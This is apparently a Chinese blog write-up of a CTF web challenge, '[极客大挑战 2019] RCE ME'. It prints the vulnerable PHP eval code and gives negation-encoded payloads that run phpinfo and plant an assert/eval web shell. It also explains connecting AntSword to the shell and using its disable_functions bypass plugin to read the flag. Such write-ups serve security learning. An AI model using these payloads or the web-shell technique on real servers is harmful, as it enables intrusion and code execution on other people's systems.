[极客大挑战 2019]RCE ME (无字母数字RCE+有长度限制)

最新推荐文章于 2024-06-01 15:41:03 发布
最新推荐文章于 2024-06-01 15:41:03 发布
阅读量1.1k 收藏 5
点赞数 1
分类专栏: Web安全 文章标签: php 开发语言 rce
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_55675216/article/details/126637769
版权 
<?php
error_reporting(0);
if(isset($_GET['code'])){
            $code=$_GET['code'];
                    if(strlen($code)>40){
                                        die("This is too Long.");
                                                }
                    if(preg_match("/[A-Za-z0-9]+/",$code)){
                                        die("NO.");
                                                }
                    @eval($code);
}
else{
            highlight_file(__FILE__);
}
 
// ?>

使用取反绕过

我们先构造phpinfo()

<?php
echo urlencode(~'phpinfo');
?>

得到%8F%97%8F%96%91%99%90
构造出新的payload:(~%8F%97%8F%96%91%99%90)();

在这里插入图片描述
?code=assert(eval($_POST[a]));

取反得到payload
(~%9E%8C%8C%9A%8D%8B)(~%9A%89%9E%93%D7%DB%A0%AF%B0%AC%AB%A4%9E%A2%D6);

antsword连接url时

http://a99ef3d2-4e11-423b-b4e0-1261bdb2eb49.node4.buuoj.cn:81/?code=(~%9E%8C%8C%9A%8D%8B)(~%9A%89%9E%93%D7%DB%A0%AF%B0%AC%AB%A4%9E%A2%D6);

将参数也带上,才能连上

根目录下有flag,但是无法读取

利用蚁剑插件:disable_functions,右键数据->加载插件->辅助工具->绕过disable_functions->然后选择PHP7_GC_UAF->点击开始,然后直接输入命令/readflag,即可得到flag

开心星人
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
phpstudy_rce.py
10-11
phpstudy_rce
cve_2019_0708_bluekeep_rce.rb
09-07
2019年5月14日微软官方发布安全补丁,修复了Windows远程桌面服务的远程代码执行漏洞,该漏洞影响了某些旧版本的Windows系统。此漏洞是预身份验证且无需用户交互,这就意味着这个漏洞可以通过网络蠕虫的方式被利用。利用此漏洞的任何恶意软件都可能从被感染的计算机传播到其他易受攻击的计算机,其方式与2017年WannaCry恶意软件的传播方式类似。 cve-2019-0708 exp msf5下的
CVE-2019-11043:php-fpm + Nginx RCE
03-08
CVE-2019-11043 php-fpm + Nginx RCE 0x01安装phuip-fpizdam-Mac go get github.com/neex/phuip-fpizdam go install github.com/neex/phuip-fpizdam ale@Pentest ~/go go get github.com/neex/phuip-fpizdam ale@Pentest ~/go go install github.com/neex/phuip-fpizdam ale@Pentest ~/go ls bin src ale@Pentest ~/go cd bin ale@Pentest ~/go/bin ls phuip-fpizdam ale@Pentest ~/go/bin file phuip-fpizdam phuip-fpizdam: Mac
无参数 rce.md
04-01
记录一下,关于这次比赛的 wp >.< 并向大佬们积极学习 >.< 顺便混点分
cve_2019_0708_bluekeep_rce:蓝皮漏洞利用
04-29
cve_2019_0708_bluekeep_rce.rb 添加 /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb rdp.rb 替换 /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb rdp_scanner.rb 替换 /usr/share//metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb cve_2019_0708_bluekeep.rb 替换 /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluek
[极客挑战 2019]RCE ME
m0_63253040的博客
09-26 1105
r:运行PHP代码,而无需使用脚本标记“..?>”
rce-website:RCE网站
05-09
RCE网站RCE的主页(登录页面)和公告( )。 基于和修改的Polar主题。本地安装安装Python3( 完美运行) 安装Pelican和支持库pip install invoke==1.4.1pip install pelican==3.7.1pip install markdown==3.1.1如果...
Apache-druid-kafka-rce.yaml
04-30
kafka相关RCE漏洞poc,扫描器的yaml文件,可以导入yara扫描器进行授权漏洞渗透测试。
[极客挑战 2019]RCE ME1 ~~不会编程的崽
不会编程的崽的博客
02-15 648
rce 取反绕过
BUUCTF】[极客挑战 2019]RCE ME
aoao331198的博客
07-09 580
源码 首先是PHP正则绕过,有长度限制,考虑使用取反绕过 首先试试看看phpinfo 重点看这个禁用函数,禁用了很多函数 下一步试着传木马 蚁剑连接一下,显然这里需要 但是由于禁用了命令执行的函数,这里要进行绕过 网上有两种方法,一种是使用蚁剑的插件,科学上网才能下载得到 另一种是通过 & 绕过 这里不做详细讲述了,具体可以看看我的个人博客here 上传文件后使用PL...
[极客挑战 2019]RCE ME buuctf 题目详解思路
weixin_73560599的博客
08-31 675
非常经典的无字母数字RCE 且这套题目加了些过滤条件 不是特别难 只是有个disable_function 是需要注意的
BUUCTF:[极客挑战 2019]RCE ME
末初的CSDN博客
03-27 8387
这题和我这篇文章内容相关:关于PHP正则的一些绕过方法 绕过正则,有长度限制,先出一个phpinfo()看一下配置,payload很多,我上面那篇文章里面的也可以,我这里直接用取反urlencode编码绕过 PS C:\Users\Administrator> php -r "echo urlencode(~'phpinfo');" ...
[极客挑战 2019]RCE ME 1
plant1234的博客
06-24 2911
首先打开题目得到: 发现是代码审计传入的code不能大于40并且不能包含a到z的大小写字符和1到10的数字我们可以通过不在这个字符集里的字符进行绕过可以采用异或和取反这里我采用取反,绕过执行phpinfo();playload: 执行:发现对一些行数进行控制: 写一句话: 在这里,我们不能直接使用eval 因为 eval并不是php函数 所以为我们无法通过变量函数的方法进行调用。 在这里,我们使用 assert 来构造,但由于php版本问题,我们并不能直接构造...
php fpdf使用记录
最新发布
meis27461的博客
06-01 229
使用composer安装fpdf简单创建一个pdf文件并输出下载。
ctfshow RCE极限挑战
10-20
ctfshow RCE极限挑战是一种CTF比赛中的挑战,要求选手通过注入恶意代码来实现远程代码执行(Remote Code Execution,RCE)。在这个挑战中,选手需要在一个给定的代码中找到漏洞并注入自己的代码,以实现对服务器的控制。其中,ctfshow是一个POST参数,用于接收选手注入的代码。如果选手注入的代码中包含恶意代码,就可以实现RCE攻击。这个挑战的难度较高,需要选手具备一定的安全知识和技能。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

开心星人

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值